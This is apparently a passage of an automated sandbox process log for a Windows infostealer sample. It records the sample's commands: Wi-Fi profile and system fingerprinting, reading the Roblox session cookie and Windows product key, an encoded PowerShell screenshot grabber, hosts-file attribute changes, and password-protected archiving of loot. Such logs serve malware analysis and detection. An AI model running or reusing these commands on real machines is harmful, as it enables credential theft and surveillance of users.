C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4756
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2688 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2516
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:4596
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:1972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3344 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mwwhsc4l\mwwhsc4l.cmdline"5⤵PID:1980
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82EB.tmp" "c:\Users\Admin\AppData\Local\Temp\mwwhsc4l\CSCE5E42EF697D14FCB95EE6F7078D6C250.TMP"6⤵PID:744
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4444
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3252
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2272
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4956
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1272
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2604
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:812
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4784
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4756
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:3456
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:3328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:4392
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\V6pDa.zip" *"3⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\_MEI38522\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI38522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\V6pDa.zip" *4⤵
- Executes dropped EXE
PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3308
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:2800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:2620
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:1076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:628
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:544
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:1432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3588
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:2604
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4912 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffff471cc40,0x7ffff471cc4c,0x7ffff471cc582⤵PID:2704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,3729928293886151273,5404612643530342131,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:22⤵PID:2140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,3729928293886151273,5404612643530342131,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:32⤵PID:4028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,3729928293886151273,5404612643530342131,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:82⤵PID:1376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,3729928293886151273,5404612643530342131,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:4020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3316,i,3729928293886151273,5404612643530342131,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:1644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3696,i,3729928293886151273,5404612643530342131,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3704 /prefetch:12⤵PID:4284
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1300
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3560 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xa4,0x104,0x7ffff471cc40,0x7ffff471cc4c,0x7ffff471cc582⤵PID:2008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2320,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2316 /prefetch:22⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1772,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2512 /prefetch:32⤵PID:3556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2000,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2540 /prefetch:82⤵PID:936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:12⤵PID:2672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:12⤵PID:3708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3696,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4032 /prefetch:12⤵PID:2436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,3011661245909115672,5917132327814817735,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:82⤵PID:4540
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level2⤵
- Drops file in Program Files directory
PID:4708 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ff60c724698,0x7ff60c7246a4,0x7ff60c7246b03⤵
- Drops file in Program Files directory
PID:3948
-
-
-
